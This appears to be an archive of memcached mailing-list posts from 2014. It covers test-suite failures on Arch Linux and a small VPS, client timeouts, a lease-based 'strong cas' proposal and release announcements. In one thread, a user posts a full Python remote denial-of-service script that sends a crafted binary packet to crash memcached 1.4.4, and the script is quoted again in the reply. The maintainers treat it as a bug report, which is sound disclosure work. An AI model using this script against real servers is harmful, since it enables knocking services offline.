 STAT 5:free_chunks 0
 STAT 5:free_chunks_end 0
 STAT 5:mem_requested 766866823
 STAT 5:get_hits 2762768607
 STAT 5:cmd_set 445418784
 STAT 5:delete_hits 15806705
 STAT 5:incr_hits 0
 STAT 5:decr_hits 0
 STAT 5:cas_hits 0
 STAT 5:cas_badval 0
 STAT 5:touch_hits 0
 STAT 6:chunk_size 304
 STAT 6:chunks_per_page 3449
 STAT 6:total_pages 2304
 STAT 6:total_chunks 7946496
 STAT 6:used_chunks 7946496
 STAT 6:free_chunks 0
 STAT 6:free_chunks_end 0
 STAT 6

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-04 Thread dormando
I'm stumped. (also, your e-mails aren't updating the ticket...).

It's impossible for a connection to get into the closed state without
having event_del() and close() called on the socket. A socket slot isn't
event_add()'ed again until after the state is reset to 'init_state'.

There was no code path for event_del to actually fail so far as I could
see.

I've e-mailed steven grimm for ideas but either that's not his e-mail
anymore or he's not going to respond.

I really don't know. I guess the old code would've just called conn_close
again by accident... I don't see how the logic changed in any significant
way in .18. Though again, if it happened with any frequency people's
curr_conns stat would go negative.

So... either that always happened and we never noticed, or your particular
OS is corrupt. There're probably 10,000+ installs of .18+ now and only one
complaint, so I'm a little hesitant to spend a ton of time on this until
we get more reports.

You should downgrade to .17.

On Sun, 4 May 2014, notificati...@commando.io wrote:

 Damn it, got network timeout. CPU 3 is using 100% cpu from memcached.
 Here is the result of stat to verify using new version of memcached and 
 libevent:

 STAT version 1.4.19
 STAT libevent 2.0.18-stable


 On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote:
   Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 
 2.0.18. Will advise if I see memcached timeouts. Should be good
   though.

 Thanks so much for all the help and patience. Really appreciated.

 On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote:
   Updates:
   Status: Invalid

   Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): 
 Server  
   127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
   http://code.google.com/p/memcached/issues/detail?id=363

   Any repeat crashes? I'm going to close this. it looks like remi  
   shipped .19. reopen or open a new one if it hangs in the same way 
 somehow...

   Well. 19 won't be printing anything, and it won't hang, but if it's  
   actually our bug and not libevent it would end up spinning CPU. Keep an 
 eye  
   out I guess.

   --
   You received this message because this project is configured to send 
 all  
   issue notifications to this address.
   You may adjust your notification preferences at:
   https://code.google.com/hosting/settings

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


1.4.19

2014-05-01 Thread dormando
http://code.google.com/p/memcached/wiki/ReleaseNotes1419

Thanks to everyone who helped out with the bugfixes for this release.
Don't want to get my hopes up but I think we're finally running out of
segfaults and refcount leaks (until we go changing more stuff again..).

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-01 Thread dormando
What's the output of:

$ prove -v t/lru-crawler.t

How long are the tests taking to run? This has definitely been tested on
ubuntu 12.04 (which is what I assume you meant?), but not something with
so little RAM.

On Thu, 1 May 2014, Wilfred Khalik wrote:

 Hi guys,

 I get the below failure error when I run the make test command:

 Any help would be appreciated.I am running this on 512MB Digital Ocean VPS by 
 the way on Linux 12.0.4.4 LTS.

 Slab Stats 64
 Thread stats 200
 Global stats 208
 Settings 124
 Item (no cas) 32
 Item (cas) 40
 Libevent thread 100
 Connection 340
 
 libevent thread cumulative 13100
 Thread stats cumulative 13000
 ./testapp
 1..48
 ok 1 - cache_create
 ok 2 - cache_constructor
 ok 3 - cache_constructor_fail
 ok 4 - cache_destructor
 ok 5 - cache_reuse
 ok 6 - cache_redzone
 ok 7 - issue_161
 ok 8 - strtol
 ok 9 - strtoll
 ok 10 - strtoul
 ok 11 - strtoull
 ok 12 - issue_44
 ok 13 - vperror
 ok 14 - issue_101
 ok 15 - start_server
 ok 16 - issue_92
 ok 17 - issue_102
 ok 18 - binary_noop
 ok 19 - binary_quit
 ok 20 - binary_quitq
 ok 21 - binary_set
 ok 22 - binary_setq
 ok 23 - binary_add
 ok 24 - binary_addq
 ok 25 - binary_replace
 ok 26 - binary_replaceq
 ok 27 - binary_delete
 ok 28 - binary_deleteq
 ok 29 - binary_get
 ok 30 - binary_getq
 ok 31 - binary_getk
 ok 32 - binary_getkq
 ok 33 - binary_incr
 ok 34 - binary_incrq
 ok 35 - binary_decr
 ok 36 - binary_decrq
 ok 37 - binary_version
 ok 38 - binary_flush
 ok 39 - binary_flushq
 ok 40 - binary_append
 ok 41 - binary_appendq
 ok 42 - binary_prepend
 ok 43 - binary_prependq
 ok 44 - binary_stat
 ok 45 - binary_illegal
 ok 46 - binary_pipeline_hickup
 SIGINT handled.
 ok 47 - shutdown
 ok 48 - stop_server
 prove ./t
 t/00-startup.t ... 1/18 getaddrinfo(): Name or service not known
 failed to listen on TCP port 38181: Success
 t/00-startup.t ... 13/18 slab class   1: chunk size        80 perslab   
 13107
 slab class   2: chunk size       104 perslab   10082
 slab class   3: chunk size       136 perslab    7710
 slab class   4: chunk size       176 perslab    5957
 slab class   5: chunk size       224 perslab    4681
 slab class   6: chunk size       280 perslab    3744
 slab class   7: chunk size       352 perslab    2978
 slab class   8: chunk size       440 perslab    2383
 slab class   9: chunk size       552 perslab    1899
 slab class  10: chunk size       696 perslab    1506
 slab class  11: chunk size       872 perslab    1202
 slab class  12: chunk size      1096 perslab     956
 slab class  13: chunk size      1376 perslab     762
 slab class  14: chunk size      1720 perslab     609
 slab class  15: chunk size      2152 perslab     487
 slab class  16: chunk size      2696 perslab     388
 slab class  17: chunk size      3376 perslab     310
 slab class  18: chunk size      4224 perslab     248
 slab class  19: chunk size      5280 perslab     198
 slab class  20: chunk size      6600 perslab     158
 slab class  21: chunk size      8256 perslab     127
 slab class  22: chunk size     10320 perslab     101
 slab class  23: chunk size     12904 perslab      81
 slab class  24: chunk size     16136 perslab      64
 slab class  25: chunk size     20176 perslab      51
 slab class  26: chunk size     25224 perslab      41
 slab class  27: chunk size     31536 perslab      33
 slab class  28: chunk size     39424 perslab      26
 slab class  29: chunk size     49280 perslab      21
 slab class  30: chunk size     61600 perslab      17
 slab class  31: chunk size     77000 perslab      13
 slab class  32: chunk size     96256 perslab      10
 slab class  33: chunk size    120320 perslab       8
 slab class  34: chunk size    150400 perslab       6
 slab class  35: chunk size    188000 perslab       5
 slab class  36: chunk size    235000 perslab       4
 slab class  37: chunk size    293752 perslab       3
 slab class  38: chunk size    367192 perslab       2
 slab class  39: chunk size    458992 perslab       2
 slab class  40: chunk size    573744 perslab       1
 slab class  41: chunk size    717184 perslab       1
 slab class  42: chunk size   1048576 perslab       1
 26 server listening (auto-negotiate)
 27 server listening (auto-negotiate)
 28 send buffer was 180224, now 268435456
 32 send buffer was 180224, now 268435456
 31 server listening (udp)
 35 server listening (udp)
 30 server listening (udp)
 34 server listening (udp)
 29 server listening (udp)
 33 server listening (udp)
 28 server listening (udp)
 32 server listening (udp)
 slab class   1: chunk size        80 perslab   13107
 slab class   2: chunk size       104 perslab   10082
 slab class   3: chunk size       136 perslab    7710
 slab class   4: chunk size       176 perslab    5957
 slab class   5: chunk size       224 perslab    4681
 slab class   6: chunk size       280 perslab    3744
 slab class   7: chunk size       352 perslab    2978
 slab class   8: chunk size       440 perslab    2383
 slab 

Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-01 Thread dormando
I don't know. I need to see the output of that program.

On Thu, 1 May 2014, Wilfred Khalik wrote:

 By the way, how RAM is enough RAM?

 On Friday, May 2, 2014 1:28:57 PM UTC+12, Dormando wrote:
   What's the output of:

   $ prove -v t/lru-crawler.t

   How long are the tests taking to run? This has definitely been tested on
   ubuntu 12.04 (which is what I assume you meant?), but not something with
   so little RAM.

   On Thu, 1 May 2014, Wilfred Khalik wrote:

Hi guys,
   
I get the below failure error when I run the make test command:
   
Any help would be appreciated.I am running this on 512MB Digital 
 Ocean VPS by the way on Linux 12.0.4.4 LTS.
   
Slab Stats 64
Thread stats 200
Global stats 208
Settings 124
Item (no cas) 32
Item (cas) 40
Libevent thread 100
Connection 340

libevent thread cumulative 13100
Thread stats cumulative 13000
./testapp
1..48
ok 1 - cache_create
ok 2 - cache_constructor
ok 3 - cache_constructor_fail
ok 4 - cache_destructor
ok 5 - cache_reuse
ok 6 - cache_redzone
ok 7 - issue_161
ok 8 - strtol
ok 9 - strtoll
ok 10 - strtoul
ok 11 - strtoull
ok 12 - issue_44
ok 13 - vperror
ok 14 - issue_101
ok 15 - start_server
ok 16 - issue_92
ok 17 - issue_102
ok 18 - binary_noop
ok 19 - binary_quit
ok 20 - binary_quitq
ok 21 - binary_set
ok 22 - binary_setq
ok 23 - binary_add
ok 24 - binary_addq
ok 25 - binary_replace
ok 26 - binary_replaceq
ok 27 - binary_delete
ok 28 - binary_deleteq
ok 29 - binary_get
ok 30 - binary_getq
ok 31 - binary_getk
ok 32 - binary_getkq
ok 33 - binary_incr
ok 34 - binary_incrq
ok 35 - binary_decr
ok 36 - binary_decrq
ok 37 - binary_version
ok 38 - binary_flush
ok 39 - binary_flushq
ok 40 - binary_append
ok 41 - binary_appendq
ok 42 - binary_prepend
ok 43 - binary_prependq
ok 44 - binary_stat
ok 45 - binary_illegal
ok 46 - binary_pipeline_hickup
SIGINT handled.
ok 47 - shutdown
ok 48 - stop_server
prove ./t
t/00-startup.t ... 1/18 getaddrinfo(): Name or service not known
failed to listen on TCP port 38181: Success
t/00-startup.t ... 13/18 slab class   1: chunk size        80 
 perslab   13107
slab class   2: chunk size       104 perslab   10082
slab class   3: chunk size       136 perslab    7710
slab class   4: chunk size       176 perslab    5957
slab class   5: chunk size       224 perslab    4681
slab class   6: chunk size       280 perslab    3744
slab class   7: chunk size       352 perslab    2978
slab class   8: chunk size       440 perslab    2383
slab class   9: chunk size       552 perslab    1899
slab class  10: chunk size       696 perslab    1506
slab class  11: chunk size       872 perslab    1202
slab class  12: chunk size      1096 perslab     956
slab class  13: chunk size      1376 perslab     762
slab class  14: chunk size      1720 perslab     609
slab class  15: chunk size      2152 perslab     487
slab class  16: chunk size      2696 perslab     388
slab class  17: chunk size      3376 perslab     310
slab class  18: chunk size      4224 perslab     248
slab class  19: chunk size      5280 perslab     198
slab class  20: chunk size      6600 perslab     158
slab class  21: chunk size      8256 perslab     127
slab class  22: chunk size     10320 perslab     101
slab class  23: chunk size     12904 perslab      81
slab class  24: chunk size     16136 perslab      64
slab class  25: chunk size     20176 perslab      51
slab class  26: chunk size     25224 perslab      41
slab class  27: chunk size     31536 perslab      33
slab class  28: chunk size     39424 perslab      26
slab class  29: chunk size     49280 perslab      21
slab class  30: chunk size     61600 perslab      17
slab class  31: chunk size     77000 perslab      13
slab class  32: chunk size     96256 perslab      10
slab class  33: chunk size    120320 perslab       8
slab class  34: chunk size    150400 perslab       6
slab class  35: chunk size    188000 perslab       5
slab class  36: chunk size    235000 perslab       4
slab class  37: chunk size    293752 perslab       3
slab class  38: chunk size    367192 perslab       2
slab class  39: chunk

Re: Java memcached timeout

2014-04-25 Thread dormando
http://memcached.org/timeouts

also, you haven't said what version you're on of memcached? or provided
stats, or etc...

On Fri, 25 Apr 2014, Filippe Costa Spolti wrote:

 Helle guys,

 Anyone already had a problem similar to this:

 Caused by: java.util.concurrent.ExecutionException: 
 net.spy.memcached.internal.CheckedOperationTimeoutException: Operation timed 
 out. - failing
 node: localhost/127.0.0.1:11211
     at 
 net.spy.memcached.internal.OperationFuture.get(OperationFuture.java:106) 
 [spymemcached-2.8.1.jar:2.8.1]
     at net.spy.memcached.internal.GetFuture.get(GetFuture.java:62) 
 [spymemcached-2.8.1.jar:2.8.1]
     at net.spy.memcached.MemcachedClient.get(MemcachedClient.java:997) 
 [spymemcached-2.8.1.jar:2.8.1]
     ... 80 more
 Caused by: net.spy.memcached.internal.CheckedOperationTimeoutException: 
 Operation timed out. - failing node: localhost/127.0.0.1:11211

 ?

 it's happening everyday here..

 A new version can fix it?

 --
 Regards,
 __
 Filippe Costa Spolti
 Linux User n°515639 - http://counter.li.org/
 filippespo...@gmail.com
 Be yourself
 [IMAGE]

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Memcached vulnerabilitie

2014-04-23 Thread dormando
what version are you testing?

On Wed, 23 Apr 2014, Filippe Costa Spolti wrote:

 Hello everyone.
 THis python script crash the memcached.

 import sys
 import socket

 print Memcached Remote DoS - Bursting Clouds yo!
 if len(sys.argv) != 3:
     print Usage: %s host port %(sys.argv[0])
     sys.exit(1)

 target = sys.argv[1]
 port = sys.argv[2]

 print [+] Target Host: %s %(target)
 print [+] Target Port: %s %(port)

 kill = \x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff
 kill +=\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 kill +=\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea

 hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
 try:
     hax.connect((target, int(port)))
     print [+] Connected, firing payload!
 except:
     print [-] Connection Failed... Is there even a target?
     sys.exit(1)
 try:
     hax.send(kill)
     print [+] Payload Sent!
 except:
     print [-] Payload Sending Failure... WTF?
     sys.exit(1)
 hax.close()
 print [*] Should be dead...

 --
 Regards,
 __
 Filippe Costa Spolti
 Linux User n°515639 - http://counter.li.org/
 filippespo...@gmail.com
 Be yourself
 [IMAGE]

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Memcached vulnerabilitie

2014-04-23 Thread dormando
can you... try against a version that isn't four years old?

we patched something similar to this a while back.

On Wed, 23 Apr 2014, Filippe Costa Spolti wrote:

 memcached 1.4.4



 Regards,
 __
 Filippe Costa Spolti
 Linux User n°515639 - http://counter.li.org/
 filippespo...@gmail.com
 Be yourself
 [IMAGE]
 On 04/23/2014 06:24 PM, dormando wrote:

 what version are you testing?

 On Wed, 23 Apr 2014, Filippe Costa Spolti wrote:

 Hello everyone.
 THis python script crash the memcached.

 import sys
 import socket

 print Memcached Remote DoS - Bursting Clouds yo!
 if len(sys.argv) != 3:
     print Usage: %s host port %(sys.argv[0])
     sys.exit(1)

 target = sys.argv[1]
 port = sys.argv[2]

 print [+] Target Host: %s %(target)
 print [+] Target Port: %s %(port)

 kill = \x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff
 kill +=\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
 kill +=\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea

 hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
 try:
     hax.connect((target, int(port)))
     print [+] Connected, firing payload!
 except:
     print [-] Connection Failed... Is there even a target?
     sys.exit(1)
 try:
     hax.send(kill)
     print [+] Payload Sent!
 except:
     print [-] Payload Sending Failure... WTF?
     sys.exit(1)
 hax.close()
 print [*] Should be dead...

 --
 Regards,
 __
 Filippe Costa Spolti
 Linux User n°515639 - http://counter.li.org/
 filippespo...@gmail.com
 Be yourself
 [IMAGE]

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Add a feature 'strong cas', developed from 'lease' that mentioned in Facebook's paper

2014-04-20 Thread dormando
Well I haven't read the lease paper yet. Ryan, can folks more familiar
with the actual implementation have a look through it maybe?

On Thu, 17 Apr 2014, Zhiwei Chan wrote:


 I m working on a trading system, and getting stale data for the system is 
 unaccepted at most of the time. But the high throughput make it
 impossible to get all data from mysql. So i want to make it more reliable 
 when use memcache as a cache. Facebook's paper Scaling Memcache at
 Facebook mentions a method called ‘lease' and 'mcsqueal', but the mcsqueal 
 is difficult for my case, because it is hard to get the key for mysql.

 Adding the 'strong cas' feature is devoted to solve the following typical 
 problems, client A and Client B want to update the same key, and A(set
 key=1)update database before B(set key=2):
 key not exist in cache: (A get-miss)-(B get-miss)-(B set key=2) - (A set 
 key=1);
 or key exist in cache: (A delete key)-(B delete key)-(B set key=2) - (A 
 set key=1);
 Some thing Wrong! the key=2 in database but key=1 in cache.

 It is possible to happen in a high concurrent system, and i don't find a way 
 to solve it with the current cas method. So i add two command 'getss'
 and 'deletess', they will create a lease and return a cas-unique, or tell the 
 client there already exist lease on the server. the client can do
 something to prevent stale data. such as wait, or invalidate the pre-lease.
 I also think the lease is a concept of 'dirty lock', because anybody try to 
 update it will replace itself expiration to the lease's expiration(the
 lease's expiration time should be very short), so in the worst case(low 
 probability), the stale data only exist in cache for a short time. It is
 accepted for most app in my case.

 For more detail information, please read doc/strongcas.txt. And hoping for u 
 guys suggestion ~_~

  i have created a pull request on github.
 https://github.com/memcached/memcached/pull/65

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: 1.4.18

2014-04-19 Thread dormando
Well, that learns me for trying to write software without the 10+ VM
buildbots...

The i386 one, can you include the output of stats settings, and also
manually run: lru_crawler enable (or start with -o lru_crawler) then run
stats settings again please? Really weird that it fails there, but not
the lines before it looking for the OK while enabling it.

On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39
from 3 to 8 and try again? I was trying to be clever but that may not be
working out.

Thanks! At least there're still people trying to maintain it for some
distros...

 On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote:
   http://code.google.com/p/memcached/wiki/ReleaseNotes1418


 I just tried building the Arch Linux package for this and got failures when 
 running the test suite. This was the output from the 32-bit i686 build;
 I saw the same results building for x86_64. Let me know what other relevant 
 information might help.

 #   Failed test at t/lru-crawler.t line 45.
 #  got: undef
 # expected: 'yes'
 t/lru-crawler.t ..
 Failed 96/189 subtests
 t/lru.t .. ok
 t/maxconns.t . ok
 t/multiversioning.t .. ok
 t/noreply.t .. ok
 t/slabs_reassign.t ... ok
 t/stats-conns.t .. ok
 t/stats-detail.t . ok
 t/stats.t  ok
 t/touch.t  ok
 t/udp.t .. ok
 t/unixsocket.t ... ok
 t/whitespace.t ... skipped: Skipping tests probably because you don't 
 have git.

 Test Summary Report
 ---
 t/lru-crawler.t    (Wstat: 13 Tests: 94 Failed: 1)
   Failed test:  94
   Non-zero wait status: 13
   Parse errors: Bad plan.  You planned 189 tests but ran 94.
 Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr  0.05 sys +  2.27 cusr  
 0.35 csys =  3.43 CPU)
 Result: FAIL
 Makefile:1376: recipe for target 'test' failed
 make: *** [test] Error 1
 == ERROR: A failure occurred in check().
     Aborting...



 Running out of a git checkout on x86_64, I get slightly different results:

 t/item_size_max.t  ok
 t/line-lengths.t . ok
 t/lru-crawler.t .. 93/189
 #   Failed test 'slab1 now has 60 used chunks'
 #   at t/lru-crawler.t line 57.
 #  got: '90'
 # expected: '60'

 #   Failed test 'slab1 has 30 reclaims'
 #   at t/lru-crawler.t line 59.
 #  got: '0'
 # expected: '30'
 # Looks like you failed 2 tests of 189.
 t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200)
 Failed 2/189 subtests
 t/lru.t .. ok
 t/maxconns.t . ok
 t/multiversioning.t .. ok
 t/noreply.t .. ok
 t/slabs_reassign.t ... ok
 t/stats-conns.t .. ok
 t/stats-detail.t . ok
 t/stats.t  ok
 t/touch.t  ok
 t/udp.t .. ok
 t/unixsocket.t ... ok
 t/whitespace.t ... 1/120
 #   Failed test '0001-Support-V-version-option.patch (see 
 devtools/clean-whitespace.pl)'
 #   at t/whitespace.t line 40.
 t/whitespace.t ... 27/120 # Looks like you failed 1 test of 120.
 t/whitespace.t ... Dubious, test returned 1 (wstat 256, 0x100)
 Failed 1/120 subtests

 Test Summary Report
 ---
 t/lru-crawler.t    (Wstat: 512 Tests: 189 Failed: 2)
   Failed tests:  96-97
   Non-zero exit status: 2
 t/whitespace.t (Wstat: 256 Tests: 120 Failed: 1)
   Failed test:  1
   Non-zero exit status: 1
 Files=48, Tests=7193, 115 wallclock secs ( 1.39 usr  0.15 sys +  5.39 cusr  
 1.02 csys =  7.95 CPU)
 Result: FAIL
 Makefile:1482: recipe for target 'test' failed
 make: *** [test] Error 1

  
 $ git describe
 1.4.18

 $ uname -a
 Linux galway 3.14.1-1-ARCH #1 SMP PREEMPT Mon Apr 14 20:40:47 CEST 2014 
 x86_64 GNU/Linux

 $ gcc --version
 gcc (GCC) 4.8.2 20140206 (prerelease)
 Copyright (C) 2013 Free Software Foundation, Inc.
 This is free software; see the source for copying conditions.  There is NO
 warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: 1.4.18

2014-04-19 Thread dormando
 On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote:
   Well, that learns me for trying to write software without the 10+ VM
   buildbots...

   The i386 one, can you include the output of stats settings, and also
   manually run: lru_crawler enable (or start with -o lru_crawler) then 
 run
   stats settings again please? Really weird that it fails there, but not
   the lines before it looking for the OK while enabling it.


 As soon as I type lru_crawler enable, memcached crashes. I see this in 
 dmesg.

 [189571.108397] traps: memcached-debug[31776] general protection ip:f7749988 
 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000]
 [189969.840918] traps: memcached-debug[2600] general protection 
 ip:7f976510a1c8 sp:7f976254aed8 error:0 in 
 libpthread-2.19.so[7f97650f9000+18000]
 [195892.554754] traps: memcached-debug[31871] general protection ip:f76f0988 
 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000]

 Starting with -o lru_crawler also crashes.

 [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 
 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000]

 This is running both 32 bit and 64 bit executables on the same build box; 
 note in the above dmesg output that two of them appear to be from 32-bit
 processes, and we also see a crash in what looks a lot like a 64 bit pointer 
 address, if I'm reading this right...

Uhh... is your cross compile goofed?

Any chance you could start the memcached-debug binary under gdb and then
crash it the same way? Get a full stack trace.

Thinking if I even have a 32bit host left somewhere to test with... will
have to spin up the VM's later, but a stacktrace might be enlightening
anyway.

Thanks!


   On the 64bit host, can you try increasing the sleep on 
 t/lru-crawler.t:39
   from 3 to 8 and try again? I was trying to be clever but that may not be
   working out.


 Didn't change anything, same two failures with the same output listed.

I feel like something's a bit different between your two tests. In the
first set, it's definitely not crashing for the 64bit test, but not
working either. Is something weird going on with the second set of tests?
You noted it seems to be running a 32bit binary still.


   Thanks! At least there're still people trying to maintain it for some
   distros...

On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote:
      http://code.google.com/p/memcached/wiki/ReleaseNotes1418
   
   
I just tried building the Arch Linux package for this and got 
 failures when running the test suite. This was the output from the
   32-bit i686 build;
I saw the same results building for x86_64. Let me know what other 
 relevant information might help.
   
#   Failed test at t/lru-crawler.t line 45.
#  got: undef
# expected: 'yes'
t/lru-crawler.t ..
Failed 96/189 subtests
t/lru.t .. ok
t/maxconns.t . ok
t/multiversioning.t .. ok
t/noreply.t .. ok
t/slabs_reassign.t ... ok
t/stats-conns.t .. ok
t/stats-detail.t . ok
t/stats.t  ok
t/touch.t  ok
t/udp.t .. ok
t/unixsocket.t ... ok
t/whitespace.t ... skipped: Skipping tests probably because you 
 don't have git.
   
Test Summary Report
---
t/lru-crawler.t    (Wstat: 13 Tests: 94 Failed: 1)
  Failed test:  94
  Non-zero wait status: 13
  Parse errors: Bad plan.  You planned 189 tests but ran 94.
Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr  0.05 sys +  2.27 
 cusr  0.35 csys =  3.43 CPU)
Result: FAIL
Makefile:1376: recipe for target 'test' failed
make: *** [test] Error 1
== ERROR: A failure occurred in check().
    Aborting...
   
   
   
Running out of a git checkout on x86_64, I get slightly different 
 results:
   
t/item_size_max.t  ok
t/line-lengths.t . ok
t/lru-crawler.t .. 93/189
#   Failed test 'slab1 now has 60 used chunks'
#   at t/lru-crawler.t line 57.
#  got: '90'
# expected: '60'
   
#   Failed test 'slab1 has 30 reclaims'
#   at t/lru-crawler.t line 59.
#  got: '0'
# expected: '30'
# Looks like you failed 2 tests of 189.
t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200)
Failed 2/189 subtests
t/lru.t .. ok
t/maxconns.t . ok
t/multiversioning.t .. ok
t/noreply.t .. ok
t/slabs_reassign.t ... ok
t/stats-conns.t .. ok
t/stats-detail.t . ok
t/stats.t  ok
t/touch.t  ok

Re: 1.4.18

2014-04-19 Thread dormando
Er... reading comprehension fail. I meant 64bit binary still at the
bottom there.

On Sat, 19 Apr 2014, dormando wrote:

  On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote:
Well, that learns me for trying to write software without the 10+ VM
buildbots...
 
The i386 one, can you include the output of stats settings, and also
manually run: lru_crawler enable (or start with -o lru_crawler) 
  then run
stats settings again please? Really weird that it fails there, but 
  not
the lines before it looking for the OK while enabling it.
 
 
  As soon as I type lru_crawler enable, memcached crashes. I see this in 
  dmesg.
 
  [189571.108397] traps: memcached-debug[31776] general protection 
  ip:f7749988 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000]
  [189969.840918] traps: memcached-debug[2600] general protection 
  ip:7f976510a1c8 sp:7f976254aed8 error:0 in 
  libpthread-2.19.so[7f97650f9000+18000]
  [195892.554754] traps: memcached-debug[31871] general protection 
  ip:f76f0988 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000]
 
  Starting with -o lru_crawler also crashes.
 
  [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 
  sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000]
 
  This is running both 32 bit and 64 bit executables on the same build box; 
  note in the above dmesg output that two of them appear to be from 32-bit
  processes, and we also see a crash in what looks a lot like a 64 bit 
  pointer address, if I'm reading this right...

 Uhh... is your cross compile goofed?

 Any chance you could start the memcached-debug binary under gdb and then
 crash it the same way? Get a full stack trace.

 Thinking if I even have a 32bit host left somewhere to test with... will
 have to spin up the VM's later, but a stacktrace might be enlightening
 anyway.

 Thanks!

 
On the 64bit host, can you try increasing the sleep on 
  t/lru-crawler.t:39
from 3 to 8 and try again? I was trying to be clever but that may not 
  be
working out.
 
 
  Didn't change anything, same two failures with the same output listed.

 I feel like something's a bit different between your two tests. In the
 first set, it's definitely not crashing for the 64bit test, but not
 working either. Is something weird going on with the second set of tests?
 You noted it seems to be running a 32bit binary still.

 
Thanks! At least there're still people trying to maintain it for some
distros...
 
 On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote:
       http://code.google.com/p/memcached/wiki/ReleaseNotes1418


 I just tried building the Arch Linux package for this and got 
  failures when running the test suite. This was the output from the
32-bit i686 build;
 I saw the same results building for x86_64. Let me know what other 
  relevant information might help.

 #   Failed test at t/lru-crawler.t line 45.
 #  got: undef
 # expected: 'yes'
 t/lru-crawler.t ..
 Failed 96/189 subtests
 t/lru.t .. ok
 t/maxconns.t . ok
 t/multiversioning.t .. ok
 t/noreply.t .. ok
 t/slabs_reassign.t ... ok
 t/stats-conns.t .. ok
 t/stats-detail.t . ok
 t/stats.t  ok
 t/touch.t  ok
 t/udp.t .. ok
 t/unixsocket.t ... ok
 t/whitespace.t ... skipped: Skipping tests probably because you 
  don't have git.

 Test Summary Report
 ---
 t/lru-crawler.t    (Wstat: 13 Tests: 94 Failed: 1)
   Failed test:  94
   Non-zero wait status: 13
